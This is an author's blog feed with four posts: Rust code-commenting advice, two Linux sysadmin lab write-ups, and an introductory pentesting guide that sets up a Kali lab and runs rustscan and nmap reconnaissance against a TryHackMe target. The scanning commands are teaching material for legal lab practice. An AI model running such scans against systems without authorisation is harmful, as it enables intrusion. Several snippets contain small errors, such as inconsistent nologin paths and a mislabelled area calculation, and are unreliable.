DEV Community: Artur Serra

Rustlings #1 (Or The Power of Comments in Programming)

Artur Serra — Sat, 18 Mar 2023 17:07:45 +0000

The first Rustling challenge shows us how comments are an essential part of programming, bringing - in one way or another - numerous benefits to developers and teams. They serve as a form of documentation that makes it easier for developers to understand the code by providing context, clarity, and explanations of how the code works, helping developers to save time and effort by reducing the need to decipher code and allowing them to focus on the actual problem-solving.

(Original post on - https://www.therustyco.de/post/rustlings-1-or-the-power-of-comments-in-programming)

I. Introduction

Comments are an essential and often overlooked part of programming, especially in complex projects where there can be a lot of code to navigate. They serve as a form of documentation that makes it easier for developers to understand the code by providing context, clarity, and explanations of how the code works. This helps developers to save time and effort by reducing the need to decipher code and allowing them to focus on the actual problem solving. In addition, comments can also help to identify potential issues, highlight tricky code, and provide insights into why certain decisions were made during the development process.

In this blog post, we will explore the importance of commenting code and the benefits that it can bring to developers in more detail. We will delve deeper into the different types of comments, such as single-line and multi-line comments, and provide examples of how they can be used effectively. We will also discuss self-documented code, which is code that is written in a way that is easy to read and understand, even without comments. By understanding the importance of self-documented code, you can write code that is not only functional but also easy to understand.

Furthermore, we will cover the best practices for commenting code. By following these methods, you can ensure that your comments are consistent, easy to read and effective. Then, we’ll take a look on some examples of tricky code, and how commenting can be important to make code understandable in this scenario.

By following these best practices, you can write code that is well-documented, easy to understand, and maintainable for years to come. With comments, you can ensure that your code is readable and maintainable by others (or the future you). This is especially important when working on a team, as it can lead to better collaboration and more efficient development. By the end of this post, you will have a deeper understanding of how comments can benefit your development process and how to write efficient code with comments.

In the first Rustling challenge, we face a simple task for most experienced programmers, but it may not be so simple for beginners: Remove a comment from the code. However, even more experienced programmers don’t fully understand all the implications and strategies to comment their code, which can be prejudicial for their collaborative work with their teammates.

// intro1.rs

// About this `I AM NOT DONE` thing:
// We sometimes encourage you to keep trying things on a given exercise, even
// after you already figured it out. If you got everything working and feel
// ready for the next exercise, remove the `I AM NOT DONE` comment below.
// Execute `rustlings hint intro1` or use the `hint` watch subcommand for a hint.
//
// If you're running this using `rustlings watch`: The exercise file will be reloaded
// when you change one of the lines below! Try adding a `println!` line, or try changing
// what it outputs in your terminal. Try removing a semicolon and see what happens!

// I AM NOT DONE

To complete this challenge, simply remove the whole line that states //I AM NOT DONE, and you should be good to go. Quite simple, right? More or less. Commenting code can be a bit more challenging than that, and that’’s what I will explain to you in this post!

II. Comment the Method

Why is it important?

Documenting code is an essential part of programming, as it allows developers to understand the functionality and purpose of the code. However, simply commenting the code inside a method may not be enough to provide a complete understanding of the method's purpose and functionality. This is why it is important to also comment the method itself, providing context and a higher-level overview of its purpose within the codebase.

By commenting both the method and the code inside it, developers can gain a profound understanding of its purpose and how it contributes to the overall functionality of the codebase. This information can help other developers understand how it fits into the larger codebase and how they can use it in their own code. In addition, a method comment can also provide information about any of its potential issues or limitations, which can be useful when debugging or modifying the code.

Commenting just the code inside a method can be helpful for understanding how the code works, but it may not provide a complete understanding of the the purpose and functionality it provides. Without a method comment, other developers may have to spend more time deciphering what the method actually does, and less time fixing or improving it. By adding comments above and inside the method, developers can save time and effort by quickly understanding what the method does and how it contributes to the overall functionality of the code.

But commenting can also help with code maintenance. If a developer needs to modify or update the codebase, they can use the method comments to quickly understand the purpose of the method and any potential implications of modifying it. This can help prevent unintended consequences and make the modification process more efficient, ensuring that the codebase remains maintainable and understandable, even as it is updated and modified over time.

Best practices for commenting the method

Good method comments use clear and concise language that describes the method's purpose and functionality. They should include information about the inputs and outputs of the method, as well as any potential issues or limitations. Method comments should also be consistent with the formatting and style used throughout the codebase. This can help to make the codebase more maintainable and easier to understand for other developers. Additionally, adding examples that demonstrate how to use the method can be very helpful, especially for developers who are new to the codebase.

Bad method comments, on the other hand, are vague and may not provide enough information about the method's purpose and functionality. They may also use abbreviated or unclear names for the method, which can make it harder for other developers to understand what the method actually does. Comments that are too long or irrelevant can also be unhelpful, especially if they don't provide any useful information about the method's purpose or functionality.

When commenting a method in Rust programming, it is important to use clear and concise language that describes the method's purpose and functionality. The following are examples of good and bad method comments:

Good Example

// This is the main function. It will print a sentence in the console.
// The code should not take any arguments, it  will simply run the
// print in line - println! - macro. 
fn main() {
// Statements here are executed when the compiled binary is called.

    // Print text to the console.
    println!("Hello World!");
}

Here we have an example of the simplest code you could write in Rust, probably. A simple Hello World being printed to the console. But in this case, we added some documentation for other developers to understand what is actually going on in this method, and what we expect it to do.

Bad Example

// This prints text
fn main() {
    println!("Hello World")
}

In this other method, the comment is too vague and does not provide enough information about the method's purpose and functionality. It prints something in the console? In an actual printer? In the screen? It also does not include any information about the inputs or outputs of the method, if it should take anything or what it should return.

Good Example

/// Returns the average of a vector of integers.
///
/// # Arguments
///
/// * `numbers` - A vector of 32-bit integers.
///
/// # Examples
///
/// let numbers = vec![1, 2, 3, 4, 5];
/// let result = calculate_average(numbers);
/// assert_eq!(result, 3);
fn calculate_average(numbers: Vec<i32>) -> i32 {
    let sum = numbers.iter().sum::<i32>();
    let count = numbers.len() as i32;
    let average = sum / count;

    return average;
}

In this other case, we have a detailed set of instructions, explaining in details the functionality of this method. It also adds what arguments should be passed, what should be expected to be returned, and even some usage examples.

Bad Example

/// Calculates the average of a vector.
fn avg(numbers: Vec<i32>) -> i32 {
    let sum = numbers.iter().sum::<i32>();
    let count = numbers.len() as i32;
    let avg = sum / count;

    return avg;
}

For this method, everything looks like a mess! Abbreviation (which is even worse in the next subject, Self-Documenting Code), a vague description and no clue at all of what is being passed and what we should expect to see being returned.

III. Self-Documenting Code

What is self-documenting code?

We’ve been talking a lot about displaying the functionalities of the code in the comments, right? The self-documenting code is a concept that refers to writing code in a way that conveys its purpose and functionality without the need for additional comments. This is achieved by using descriptive variable and function names, breaking up complex code into smaller, more manageable pieces, and using consistent formatting and indentation. When code is self-documenting, it becomes easier for other developers to read and understand, reducing the need for comments and making the codebase more maintainable.

Writing self-documenting code has many advantages that can make developer’s lives easier. For one, it makes the code effortless to read and understand. When code is written with descriptive names for variables and functions, it becomes the process to understand what each part of the code does is straightforward and painless. This can lead to faster development times since developers can more quickly and easily get the gist of the codebase. Additionally, self-documenting code can reduce the need for comments. Comments can be helpful, but they can also become outdated or misleading if the code they describe is changed. Let’s say you update a method for something else, but forget to update its comments. This way, the next developer who touches the codebase will find a piece of “lying” code that can slow down their process. With self-documenting code, the code itself becomes the documentation, making it easier for other developers to understand and modify the code without the need for any additional comments. When code is self-documenting, developers can spend less time writing and updating comments and more time focusing on writing high-quality, maintainable code, which can lead to better and more efficient workflows. When code is written in a clear and concise way, it becomes easier for new developers to get up to speed and start contributing to the project, from junior to senior levels!

What are the best practices for writing self-documenting code?

When writing self-documenting code, there are several best practices that can help to make the code easier to read and understand. These include:

Using meaningful variable and function names: Variable and function names should be descriptive and convey their purpose and functionality. Avoid using names that are too short or unclear, as this can make the code harder to understand.
Avoiding abbreviations and acronyms: While abbreviations and acronyms can be useful for saving space, they can also be confusing to other developers who may not be familiar with them. Where possible, use full and descriptive names for variables and functions.
Breaking up complex code into smaller, more manageable pieces: Complex code can be difficult to read and understand, especially if it is all contained in a single function or method. To make the code easier to read, consider breaking it up into smaller, more manageable pieces. This can also make the code easier to test and debug.
Using consistent formatting and indentation: Consistent formatting and indentation can make the code easier to read and understand, especially when working with a team of developers. Use a consistent style for variable and function names, as well as for indentation and line breaks.

Examples of self-documenting code

Good Example

fn calculate_average(numbers: &[i32]) -> i32 {
    let sum = numbers.iter().sum();
    let count = numbers.len() as i32;
    let average = sum / count;
    average
}

In this example, we have a simple function that calculates the average of a vector. The function name calculate_average is descriptive and conveys its purpose. The function takes a slice of integers as an argument, which is also a explanatory name. The function also uses &[i32] instead of Vec as it's input parameter, making it more efficient and readable. The variable names within the function are also descriptive and easy to understand, making it clear what each variable represents. The return statement is also clear and concise.

Good Example

fn is_valid_name(name: &str) -> bool {
    name.chars().all(|c| c.is_ascii_alphabetic() || c == ' ')
}

This function checks whether a given string is a valid name. The function name is_valid_name effectively communicates the function's intended purpose. It takes a string slice as an argument, which is also a descriptive name. The function uses the chars method to iterate over each character in the string, and the all method to check if every character meets a certain condition. The condition is notably comprehensible and straightforward to grasp.

Good Example

let sentence = "The quick brown fox jumps over the lazy dog.";
let words: Vec<&str> = sentence.split(' ').collect();

In this example, we have a simple code that splits a sentence **_into _words**. The variable names sentence and words convey the meaning behind the variables through a quite descriptive naming. The _*split *_method is used to split the sentence into words at every space character, and the resulting words are collected into a vector. The code is clear and concise, making it easy to understand what is happening.

Bad Example

fn f(x: i32, y: i32) -> i32 {
    let a = x * y;
    let b = a / 2;
    return b;
}

In this instance, we encounter a function that computes the area of a rectangle. The name of the function, "f," fails to sufficiently indicate its intended operation. Furthermore, the names of the variables, "a" and "b," fail to provide any insight into their intended use. Additionally, the code within the function lacks self-documentation, thereby obfuscating the specific calculation being performed.

IV. Commenting Tricky Stuff

Why it is important to comment tricky or non-obvious parts of the code

Tricky or non-obvious parts of the code can make it difficult for other developers to understand how the code works. These parts of the code may be essential to the functionality of the program, but without proper comments, they can be difficult to decipher.

For instance, let's say you've developed a program that has a complex algorithm that performs a specific task. It may be difficult for another developer to understand how this algorithm works just by reading the code, even if it has a self-documented approach. By commenting each step of the algorithm, you can help other developers understand how it works, and they can modify or debug the code more efficiently. This will save them time and avoid unnecessary confusion.

Best practices for commenting tricky code

One of the most important aspects of writing clean and maintainable code is adding comments to explain the thought process behind it. One best practice to achieve this is to use inline comments. Inline comments can be placed directly next to the code they are commenting on, providing context and explanations for that piece.

Additionally, another best practice is to add comments to explain unusual or unexpected behavior. This can help other developers understand why certain decisions were made during the development process and how they might impact the codebase. It is important to keep in mind that not all developers are familiar with the same programming concepts or methodologies, so adding comments can make it easier for everyone to understand the code.

Highlighting any potential pitfalls or edge cases is also important, as it can help other developers avoid common mistakes and errors. By providing clear explanations and examples of what can go wrong, developers can be better equipped to handle any issues that may arise during the development process.

In summary, adding comments to explain the thought process behind the code, including inline comments, comments to explain unusual or unexpected behavior, and highlighting potential pitfalls or edge cases, is crucial for writing maintainable and understandable code.

Examples of tricky code and how to comment it effectively

One example of tricky code is code that uses recursion. Recursion can be difficult to understand and may require additional comments to explain how the recursive function works. Adding comments that explain the recursion logic, the base case, and the exit conditions can help other developers understand how the function works and how it contributes to the overall functionality of the codebase.

Another example of tricky code is code that involves complex algorithms or data structures. In these cases, it can be helpful to add comments that explain how the algorithm or data structure works, as well as any potential issues or limitations. This can help other developers understand how the code works and how they can modify it to fit their needs.

Code that involves external libraries or frameworks can also be tricky to understand. In these cases, adding comments that explain how the code integrates with the library or framework can be helpful. This can help other developers understand how the code works and how it interacts with the external codebase.

Finally, code that uses unusual or unexpected syntax or language features can also be tricky to understand. In these cases, adding comments that explain the syntax or features can be helpful. This can help other developers understand how the code works and how it contributes to the overall functionality of the codebase.

By following these best practices, you can ensure that tricky or non-obvious parts of the code are well-documented and easy to understand. This can help other developers modify and debug the code more efficiently and effectively, leading to a more maintainable and understandable codebase.

VI. Conclusion

In conclusion, commenting code is an essential part of programming that can bring numerous benefits to developers and teams. By providing context, clarity, and explanations of how the code works, comments can save time and effort by reducing the need to decipher code and allowing developers to focus on problem-solving. Comments can also help to identify potential issues, highlight tricky code, and provide insights into why certain decisions were made during the development process.

In this blog post, we explored the importance of commenting code and the benefits of doing so. We delved deeper into the different types of comments and provided examples of how they can be used effectively. We also discussed self-documented code and best practices for commenting code, including commenting the method, writing self-documenting code, and commenting tricky code.

We hope that this post has been helpful in encouraging you to start commenting your code more effectively. By following the best practices outlined in this post, you can ensure that your code is well-documented, easy to understand, and maintainable for years to come. Remember to use clear and concise language, avoid abbreviations and acronyms, break up complex code, and use consistent formatting and indentation.

In order to improve the maintainability and understandability of our codebases, it's important to adopt a more effective commenting strategy. By commenting our code more thoroughly, we can provide valuable guidance to other developers who may need to work with our code in the future. This can help to prevent confusion and errors, ultimately saving time and resources. Additionally, effective commenting can make our codebases more accessible to developers who may not be familiar with the specific technologies or design patterns we're working with. By explaining our thought processes and providing clear explanations of complex concepts, we can help ensure that our code can be understood and maintained by a wider range of developers. So, let's prioritize effective commenting as a key part of our development process moving forward!

Write-up: KodeKloud Sysadmin (Set or Change System's Timezone in Linux)

Artur Serra — Wed, 16 Jun 2021 18:19:17 +0000

In this task, proposed here, the sysadmin has to change the timezone in the system, to fit Australia/Brisbane. In this post, we'll go through the process to do so in the most recent Linux distributions.

For starters, you gotta check which timezone your system is currently set. Usually it's defined during the installation process, and it's important for a lot of system-related processes and tasks, like cron-jobs and application logs. To view your current timezone, run the command:

$ timedatectl

It should return to you a lot of information related to your system's clock, reference time and timezone, like:

Local time: Wed 2021-06-16 15:04:41 -03   
Universal time: Wed 2021-06-16 18:04:41 UTC   
RTC time: Wed 2021-06-16 18:04:41       
Time zone: America/Fortaleza (-03, -0300)
System clock synchronized: yes

(Remember, if you feel lost during this walk-through, just run timedatectl --help to get more information on how to correctly change your system's timezone!)

Now that you already know your current timezone, it's time to run:
$ timedatectl list-timezones
to check the exact name for your new timezone. For the purposes of this tutorial, let's stick to Europe/Oslo. We just need to find it in the list (which is quite extensive!) and copy it. If you already know the exact name of the timezone you gotta change your system to, you can just skip to the next step.

Now, run:
$ timedatectl set-timezone Europe/Oslo
and it'll change the timezone instantly.
Run again:
$ timedatectl
and your output should be more or less like this:

Local time: Wed 2021-06-16 20:16:59 CEST
Universal time: Wed 2021-06-16 18:16:59 UTC 
RTC time: Wed 2021-06-16 18:16:59     
Time zone: Europe/Oslo (CEST, +0200)   
System clock synchronized: yes                         
NTP service: active                      
RTC in local TZ: no

Write-up: KodeKloud Sysadmin (Create a Non-interactive Shell)

Artur Serra — Wed, 09 Jun 2021 17:55:41 +0000

In this task, proposed here, the sysadmin has to create a new user with a non-interactive shell. The full prompt goes as follows:

The System admin team of xFusionCorp Industries has installed a backup agent tool on all app servers. As per the tool's requirements they need to create a user with a non-interactive shell.Therefore, create a user named mark with a non-interactive shell in the app02 server

To do so, we need to understand two commands in the Linux lexicon: ssh and adduser.

First, let's use the ssh command to log into the server specified in the prompt. You can use either

ssh -l user server
or
ssh user@server

(Remember to replace user to your actual ssh username and server to your actual ssh servername).

Once we log into the specified server, we are able to create a new user with a non-interactive shell, as prompted before. In this case, we'll need to use a flag from the adduser command, the -s. According to the adduser's manual page, the -s means:

--shell SHELL
Use SHELL as the user's login shell, rather than the default specified by the configuration file.

As it says, it will set the newly created user to a shell. We need to create a non-interactive shell, which means that we need to set the user shell to /sbin/nologin. When we do so, it will prevent the user to login. It's literally written in the nologin manual page the following:

nologin - politely refuse a login

The full command we need to run is a combination of:

sudo - To access admin privileges
adduser - The command to create a new user
user - Replace it with the new user's username.
-s - The flag to set a shell to the newly created user
/bin/nologin/ - The directory related to the nologin shell.

sudo adduser user -s /bin/nologin

Getting started with Penetration Testing and building your own pentest methodology.

Artur Serra — Tue, 09 Mar 2021 01:18:47 +0000

What is Pentesting?

Protecting your business through hacking is a complex and time-consuming skill. This kind of preventive defense framework has multiple faces and categories, but one of the most known is called Penetration Testing (or Pentesting) - a formal procedure aimed at the discovery of new flaws, risks and vulnerabilities inside a company security matrix, and in a predefined scope. When it comes to pentesting, its actor - the pentester - simulates an attack against a Network, Application, or System, in order to find and exploit the said vulnerabilities, usually in a really loud, noisy way and in combination with Blue Team/Security teams inside the company (if any). However, it's impossible to make an impenetrable Network/Application/System, but the pentester will try their best to make it more difficult to bad actors to break through your fences.

What is the need of a Penetration Test?

As I mentioned before, no Network/Application/System is a fortress. If you check the number of new vulnerabilities entering the market every year, the rates are always increasing and breaking new records. This situation makes it impossible to protect an asset against all kinds of vulnerabilities it's susceptible to, but the asset owners can harden their defenses against them. The expenses a company can suffer from a successful cyberattack can be enormous, costing not only a lot of money, but also their client's trust and their brand's strength. Quoting a book that I really like that investigates the legal and economic aftermath of a cybersecurity breach, you'll only see this message when it is too late. But when it comes to small and medium business, you might not have the opportunity to be "too late", and it might cost your whole business, especially with the findings from CBNC, attesting that 43% of the attacks are aimed against small business, but only 14% are prepared to properly defend themselves.

A penetration tester can expose security holes in that company's protective shell, as well as getting an overall diagnostic on that company security layers. This will, usually, lead to reinforcement and improvement in compliance, defensive mindset and overall security protocols inside the company.

How often should I implement a Penetration Test?

As you already saw here, the numbers of new vulnerabilities are sky-rocketing and breaking new records every year. So performing a new penetration test every year should be a regular practice for companies, just to create a better security standard and re-evaluate the health of their security mechanisms. Besides that, a new pentesting assessment should ideally be performed every time a company adds:

New network infrastructure
New application launches
New offices (especially in new locations)
New major patches or updates

However it's good to point out that this must not apply to every company, and it usually depends on their presence online, their budget share allocated to security (if any) and their infrastructure. It's important to note that a company that holds most of its infrastructure in a cloud provider might not be able to perform independent penetration tests, relying on the security assessment conducted by the cloud provider itself.

The difference between penetration test and vulnerability assessment/red teaming/bug bounty/CTF

Now that you already know what the basic concepts of a Penetration Test, it's important to also distinguish it from some other security-counterparts. The confusion between any of these different procedures might cause inefficient expenses and lead to unexpected results that might be misleading, causing a scenario where the company will have a wrong evaluation of their security matrix and assets. When it comes to small and medium businesses, these common misconceptions can burn their security budget (or might even be too expensive to even consider be included in the said budget) and still leave holes in the company's shell. So, finally, what all those terms mean?

Penetration Test

The Penetration Test is the process in which the pentester conducts an assessment on a target in order to bring the vulnerabilities to light and exploit them. The main objective in a Penetration Test is to observe the network/system/application through the eyes of a malicious actor, overcoming its defenses and finally evaluating the health status of that asset security matrix, providing detailed information on its attack surface, vulnerabilities and their magnitude and how the defensive mechanisms and teams would react to it. Think of Pentesters as mongol riders, being super loud, attacking everything they can and leaving a lot of tracks.
Vulnerability Assessment

The Vulnerability Assessment is the process in which the target will be tested, usually with automatic tools and an array of manual tasks, in order to understand and evaluate the security of the assets. Different from pentests, Vulnerability Assessments should be more frequent, in order to constantly update the asset defense and lower its attack surface, especially when new vulnerabilities related to the services or applications used in the target network/application/system is released (and, as you remember, they pop up almost every day!).
Red Teaming

If you could imagine a Penetration Test as a mongol rider attack, you can imagine Red Teaming as a long campaing of ninja attacks. A Red Teaming assessment is a more focused, stealthy operation, aiming to understand the core of the security protocols in the company's human, technological and physical assets. After the Vulnerability Assessment and the Penetration Test were performed, a company with a more mature and sophisticated approach to security issues could force and benchmark its security protocols with a Red Teaming Assessment, involving not only technological aspects - as in a penetration test - but also physical components - like computers, telephones, peripherals - and human assets, via Social Engineering.
Bug Bounty Program

Bug bounty programs are usually offered by companies with a higher security-allocated budget and a refined Cybersecurity strategy, in order to constantly test and update their endpoints and applications. A Bug Bounty program is highly scalable due to its pay-for-vulnerability model - in contrast to the usual pay-for-time model in Penetration Test cases -, as well as common crowdsourced bug bounty platforms such as Bugcrowd, Hackerone and Intigriti. An outstanding advantage provided by the Bug Bounty Program is that it offers multiple perspectives from different security researchers, and this multicultural, multifaceted approach can result in different approaches on how to exploit an asset, bringing a more real-world touch to the assessment (which is clearly an advantage for companies that have an intense internet presence worldwide).
CTF

Capture-the-Flag games (or CTFs) are really good training models for enhancing one's penetration testing skills, but they are not good examples for real-world practices. For starters, usually a CTF consists of attacking a vulnerable-by-design target, finding its vulnerabilities, escalating privileges and finding "flags", pieces of text hidden inside the target. Once you found the flags, your job is done. That's not how it happens on a pentest, where you need to implement post-exploitation techniques, find relevant information inside the exploited target (not only flags) and test every way you can find to breach that asset (in contrast to CTFs, where you are after that one way to exploit the target and get the flags in the shorter amount of time possible). However, no one doubts the efficiency of these games to improve one's hacking skills, which is, of course, a good way to get more people into the minutiae of security attacks, even if they are not penetration testers themselves.

Setting Up a Pentesting Lab

You read about pentesting, understood its concepts and got a brief explanation on other security fields related to that. So, what's next? If you thought "It's time to learn the practicalities of it myself", then you're right! But, before you start practicing in a controlled environment (remember, pentesting a live target without permission is considered a crime), you need to set up your lab, and that's what we are going to do right now.

The first you need to worry about is your operational system. When it comes to Penetration Testing there are multiple options, but the two most popular ones are Kali Linux and ParrotOS. Both of them are Debian-based Linux distributions, with support for either 32-bit or 64-bit architecture, with an outstanding out-of-the-box support for useful pentest-related tools that are going to make your life easier. Just install them, find a legal practicing target and start hacking! No need to install multiple tools (even though some of them could be a nice add if you have a few minutes to spare), no need to spend a lot of time configuring stuff... They are already there!

Once you get more experienced with all the tools you need to better fit your own Methodology, you can start looking for some other options out there, or even create one distribution yourself with every single thing that's necessary to get the job done! But right now I suggest you stick to one of those, for the reasons I explained before. You don't wanna spend a lot of time looking for installation tutorials for every single tool you need, when there's already something out there with all of those tools packed in a single box, ready for use! Before you pick Kali or Parrot, I suggest you take a look and research a bit about the difference between them, especially related to the system requirements. Kali might be a little more greedy, component-wise, but the final decision is up to you.

One more thing: Those are hacking-specialized operational systems, so you are going to handle with all sorts of stuff there, which may include malware analysis. So it's recommend that you run them on a Virtual Machine, on top of your regular OS. However, this approach can be really resource-intensive, requiring 8GB or more of your RAM. So if you don't want to do that, no worries: You can still install one of those systems as your main one, but you need to be extra careful about what you do. But, once again, the final decision is up to you, so before you commit to any final words on any of these subjects, do your own research, think about it yourself and then proceed to do whatever floats your boat!

Installing the Virtual Machine

So let's get our hands dirty and start installing our tools! The first thing you'll need is a Virtual Machine. The best, free options out there are VMWare Workstation and Oracle VM VirtualBox. Once again, I recommend you do your own research to choose whatever is the best for you, but for the matters of this post I'll stick to VirtualBox. It's my favorite from those two options and I run it on every setup I use at home, basically because I got familiar with it during my graduation and things seem natural and seamless for me when it comes to configure a new machine on it. That being said, the first thing you'll need to install it is visit their website on https://www.virtualbox.org/wiki/Downloads.

Choose the platform package related to your host machine, then click on it and once the pop message shows up, save it. In my case, I'm on a Windows machine, so you might see something more or less like this:

Now it's downloaded, just click on the file and execute it.

Click on "Next" when prompted, until you reach the "Install" button. Then proceed to click on it as well, and wait for the installation wizard to complete its process.

Once it's done, just open Virtual Box and you'll be ready for the next step!

Installing your Operational System

For the purposes of this tutorial, we'll choose Kali Linux over ParrotOS, again for familiarity reasons. I've been working on Kali for a couple of years now, and I'm just more familiarized with it. However, in the past few months I've been closely watching ParrotOS release after release, and in the near future I might switch my main pentesting operational system, simply because the features and UX pleases me more than the latest Kali releases. That being said, let's head over to Offensive Security website and download our Virtual Machine-ready Kali Linux release on https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/ and click on the VirtualBox Images tab (be careful not to click on the Kali Linux VMWare Images tab!).

Once you're done downloading the Kali image, let's configure it in the VirtualBox. Open VirtualBox and then click on New on the top menu or in Machine → New (alternatively, you can also press Ctrl+N).

It will pop up the "Name and Operating System" screen, which has some pre-filled fields in it. Usually it comes with a default Windows configuration, but we need to change it to our Kali image. In the Name field you can write whatever you want. It will be your identifier for all the Virtual Machines you'll have in your Virtual Box, but for organizational reasons, let's call it Kali Linux. Select the folder where you want you VM information and snapshots to be saved inside the Machine Folder field. For Type you select Linux and finally Debian (64-bit) or Debian (32-bit), depending on you own machine's architecture. Once everything is more or less like in the screenshot below, hit Next.

Up next is the Memory Size screen, where you're going to select how much RAM resources you are going to allocate to your Virtual Machine. If you have enough RAM to allocate at least 8GB to Kali Linux, most things are going to run smoothly and you won't have a lot of trouble. If you don't have 8GB to allocate, I sugest you switch to ParrotOS or install Kali as a LiveUSB. You can also run with less than 8GB, but it might get super slow and cranky halfway through your pentesting assessments. Once you decided which option suits you best, hit on Next and let's move to the next section.

In the Hard Disk screen we just need to select Create a virtual hard disk now and hit Create.

This will pop up the Hard Disk File Type screen, and in this one we select VDI (VirtualBox Disk Image).

The following section is the Storage on Physical Hard Disk screen, and in this one we'll select dynamically allocated.

For the File Location and Size screen, we gotta select how much of our actual hard disk will our Virtual Machine be able to use. I like to select 80GB, especially because Kali Linux already comes packed with most of the tools you need to do your job, so you won't be downloading new stuff like crazy.

Once you click on create, the pop-up screen will fade and you'll be back on the home Virtual Machine menu.

With the wizard completely done, let's click on Settings (Ctrl + S)

As the Settings screen pop-up for us, let's click on General and then on Advanced, and change both the Shared Clipboard and Drag'n'Drop options to Bidirectional.

Then we change to the System tab on the left side menu, and then on the Motherboard tab we need to be sure to select only Hard Disk and Optical as boot options, and use the up and down arrows to make the boot order be: Hard Disk first and Optical second.

Still on the System Settings we move to the Processor tab and select the Processor usage to 2 CPUs and enable PAE/NX on the Extended Features checkbox.

The on the Display settings we go to the Screen tab and move Video Memory all the way up to 128MB.

On the Network Settings we gotta select the type of Network connection our Virtual Machine will have, and there are three main options when it comes to Pentesting: NAT, Bridged and Host-Only. NAT will leave your machine running as if it was on your own home network with your host machine acting like a wireless router, while the guest machines will be in a private subnet. This is optimal to your VMs connect to other VMs and also to the outside world, however your host will filter that connection.

Host-Only is accessible, as it implies, only by the host machine your VM is running on. This is an optimal network situation to be isolated from the outside world and experiment on private test web servers and malware analysis (since it cannot connect to malicious hackers in the wild).

Bridged runs your VM in the same network as your host, and it can be accessed by all computers in the host network.

Usually NAT will be okay for all pentesting purposes, but sometimes you want to use an exploit that needs to connect to your computer, and in this case NAT might cause some trouble. You can switch to Bridged if that's the case, since it offers a more "down to earth" type of connection to the outside world.

When you're done, click on OK and go back to the home menu. Your VM information will look more or less like this one

Then we click on Start on the top menu, and it will pop up another screen, asking for you the select the start-up disk. Since we're going to use the Kali image we downloaded, click on the folder icon with the arrow up in front of it.

This will open a new pop-up, and then we need to click on Add, to add a new disk image. Navigate to where you ISO file is stored, and click on it.

Once you've located your file, just hit Start and you'll be done with your process! Time to open your Kali Machine and get started!

Building Your Pentest Methodology

Before jumping into practice, let's agree on the structure of our penetration test. Whatever you (and other penetration testers) will do along the way may vary, but the structure is usually the same. You can find detailed information on pentest-standard.org and other sources, but I'll summarize it here:

Now, to provide a deeper dive into all these different phases, let's select a room on TryHackMe where we can legally utilize all tools and explain the structure step-by-step, and how to build your methodology through it.

Phase 1 - Pre-Engagement Phase

The pre-engagement phase represents the first contact between the client and the pentester. The objective of this phase is to define the scope of the penetration test, as well to explain to client predefine a time estimative for the whole assessment. Some questions must be asked and a good understanding of the scope must be perfectly determined.

In our example, we are going to test our methodology with TryHackMe's Ultratech. Considering our pre-engagement discussions, our scope would be the machine's IP: 10.10.148.123 and the time estimative would be the box's expiration time, 1h (52m 14s here in the screenshot).

Phase 2 - Information Gathering

This is arguably the most important step in a penetration test. During this phase the pentester will collect intelligence on the target defined in the scope, in order to understand the target's attack surface and start to strategize on their attack vector. As it's stated in the Pentest Standard, "The more information you are able to gather during this phase, the more vectors of attack you may be able to use in the future".

In our case, let's start figuring out how many open ports there are in our target. To do so, we can run rustscan via a docker container using:

docker run -it --rm --name rustscan rustscan/rustscan -a 10.10.148.123

Let me explain this command to you:

docker run -it —rm —name - activates the docker container I am using rustscan from.
rustscan - Rustscan is a powerful and superfast network scan tool, way better and faster than the traditional and well-known Nmap when used to identify open ports. When running a professional pentest (that will probably have a few days or weeks as time estimative) you can run rustscan multiple times and also an Nmap or other tools (like hand-crafted Python scripts) to be really sure which ports are open.
/rustscan - Rustscan's version, defining which container will be selected and utilized (in this case, since there are no special version predefined, it's running the latest).
10.10.148.123 - Our target IP.

Since Rustscan is not packed natively inside Kali Linux, you might find useful information on how to install it in the official documentation https://hub.docker.com/r/rustscan/rustscan

If you want to run nmap as well for an all-ports scanning, you can run:

nmap -sC -sV -p- 10.10.180.145

nmap - Activates nmap
-sC - Will run nmap's script reconnaissance, identifying which scripts might be useful against each of your findings.
-sV - Will determine which service version is running on each of the open ports.
-p- - Will run the nmap against all 65,535 ports available for communication. This is why it takes so long to be done, but when it's done you'll have proper information on all the available ports, instead of the standard top most common ports outcome you'll get running a simple -p.

The outcome from Rustscan will return:

So now we know we have ports 21, 22, 8081 and 31331 open. In my methodology, after running Rustscan, I like to run a complete Nmap focused on the open ports, which will return detailed information on the ports that I already know that are open.

nmap -T4 -A -Pn -v -p 21,22,8081,31331 10.10.148.123

nmap - Activates nmap
-T4 - Defines how fast nmap will perform the scan. The speed varies between T1 and T5, the latter being the fastest as well. However, it's important to note that it's also a very "noisy" approach, probably being easily detected by a mildly secure target. Normally it's not ideal to use such a fast speed in a real-world target, but it can be also a good tactic to try to run the same nmap scan with different speeds, in order to have a better understanding on the target's defenses, and what it can really identify.
-A - Enables OS detection, version detection, script scanning, and traceroute.
-Pn - Treats all hosts as online -- skip host discovery.
-v Increases verbosity level, returning more detailed information on each step of the scan
-p - Defines which ports will be scanned. If it's not specified, it will run against the top 1000 most common ports. In this case, we are specifing the ports with the findings we got in the previous step.
21,22,8081,31331 - The ports we found out with Rustscan.
10.10.148.123 - Our target's IP.

The core information outcome from the nmap scan is detailed in the screenshot below.

Phase 3 - Enumeration

One can argue that Information Gathering and Enumeration are the same steps. I would add that the process of gathering information can be extensive and even include the Phase 4 - Vulnerability Analysis in the process. No matter how you call those phases, one thing should be learned before all of this: Gather as much information as possible. Enumerate every port you find, analyze and model your threats as much as you can. This will make your life easier in the following steps, and this will also provide a lot of useful and valuable information to your client: At the end of the day, it's your job to inform them as much as you can, so the more you get out of this big Discovery Phase, the better.

Now that any naming issues have been disclaimed, let's move on with our analysis. We know the open ports already, so let's start exploring them. In my personal methodology, I like to address any HTTP Ports to see if they have a functional website from where I can extract more information. So let's start with our target's IP + 8081 (the first open HTTP Port from our scan).

As you can see, this particular website looks like it's just a work-in-progress. Let's keep this as a note, and try the other open HTTP Port, 31331

Now we have something cool here! This looks like a more complete, production-ready website. As a pentester, it's our job to explore every corner of this website looking for potential input areas, hidden information and every sorts of alluring things we can add to our report. In my case, I like to explore hidden directories first, since there are a lot more than meets the eye when it comes to web applications. Common practices such as running GoBuster or DirBuster can be really useful, but I like to start simple before running my big, brute-forcing guns. The more you explore web applications, the more you'll notice a pattern when it comes to hidden directories, and then you can also start writing your own personal list of directories you can start checking out for. In my case, considering how important it is for applications nowadays to have a good SEO policy in their websites, I like to start from a very common robots.txt file.

